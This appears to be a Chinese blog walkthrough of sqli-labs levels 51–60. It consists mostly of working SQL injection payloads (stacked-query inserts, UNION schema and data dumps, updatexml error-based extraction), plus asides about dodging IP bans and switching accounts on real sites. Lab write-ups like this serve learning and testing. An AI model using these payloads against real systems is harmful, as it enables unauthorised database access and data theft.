在sqli-liabs学习SQL注入之旅（第五十一关~第六十关）

五十一关

这一关我们直接使用堆叠注入：

?sort=1';insert into users(id,username,password) values(21,'Less51','Less51') --+

Less51数据成功插入！

五十二关

（堆叠注入，数字型，无回显）

 直接使用堆叠注入：

?sort=1;insert into users(id,username,password) values(22,'Less52','Less52') --+

Less52数据成功插入！

五十三关

（堆叠注入，字符型（单引号），无回显）

这一关和五十二关区别在于单引号。使用堆叠注入

?sort=1';insert into users(id,username,password) values(23,'Less53','Less53') --+

Less53数据成功插入！

五十四关

从五十四关开始，后面的关卡偏向于实战，看见页面对我们通关的步骤限制在10次内。所以我们要模拟实战，争取每一步都用在刀刃上！！！快速通关。

开始默认用掉一次机会！哭哭！！！

第一步：猜参数接受类型

?id=1'                页面报错

?id=1'--+           页面正常                判断参数接受类型为 id = '&id'

第一步判断用掉了两次机会！

第二步：猜字段

?id=1' order by 3--+        页面正常

?id=1' order by 4--+        页面错误        说明字段为3

第二步判断用掉了两次机会！

第三步：爆出回显点

?id=-1' union select 1,2,3 --+

第三步用掉了一次机会

第四步：爆数据库名

?id=-1' union select 1,database(),3 --+

第四步用掉了一次机会

第五步：爆表名

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

第五步用掉了一次机会

第六步：爆列名

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='lbm0lvblbu'

做完第六步，就差爆数据了，我们还有最后一次机会！！

第七步：爆数据

 ?id=-1' union select 1,group_concat(secret_L6E1),3 from lbm0lvblbu--+

次数用完，我们的数据拿到了，有惊无险！！实战中不然ip给封了。

最后一步：提交数据

页面红字翻译：恭喜你成功了！！！

 五十五关

这一关和五十四关类似，区别在于闭合方式是括号 () 。

根据上一关的代码，我们来快速通关一下。

第一步：爆数据库名

?id=-1) union select 1,database(),3--+                  得到数据库名为 challenges

第二步：爆表名

?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+                                得到表名为 e7vpre4wjj

第三步：爆列名

?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='e7vpre4wjj' --+                       得到列名 id,sessid,secret_LM1G,tryy

第四步：爆数据

?id=-1) union select 1,group_concat(secret_LM1G),group_concat(tryy) from e7vpre4wjj --+

                                                                              得到数据   087S2hFL91fDhMpALiqNNzi8

注意：这是我得到的数据，每个人得到的都不同，所以要靠自己探索出来！！！

数据提交，GAME OVER！

五十六关

 这一关和五十五关类似，区别在于这关是 单引号 + 括号。

直接缪沙！！！我过关了，你呢？

五十七关

 这一关和前面两关类似，区别在于这关是 双引号 。

顺干缪莎！！

五十八关

这一关只有5次机会，正所谓  机不可失，失不再来呀！！

 这一关如果我们按照之前的联合注入，一步一步猜字段，步数肯定是不够的。所以第一时间想到报错注入！！

第一步：判断参数接受类型

?id=1'                页面报错，根据报错信息排除有括号的可能，参数接受只有单引号。

第二步：报错语句爆出表名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+

第三步：爆列名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jwb13a7bqt'),0x7e),1)--+

第四步：爆数据

?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_EFU5) from jwb13a7bqt),0x7e),1)--+

提交数据，游戏结束！！

五十九关

 这一关和五十八关类似，区别在于这关是数字型。

直接快速秒杀！！！

六十关

  这一关和五十八、五十九关类似，区别在于这关是双引号+括号。

来秒杀一下！！（其实我也是第二次才过的关，现实中我们大不了换个号继续！！）

总结：

（1）这十关我们学了堆叠注入、报错注入；

（2）让我们从靶场走向实际场景中，实战中很多网站会限制你的访问次数，他会通过你的输入，你访问的流量大小判断你是否在入侵，然后封掉你 ip 或 账号！！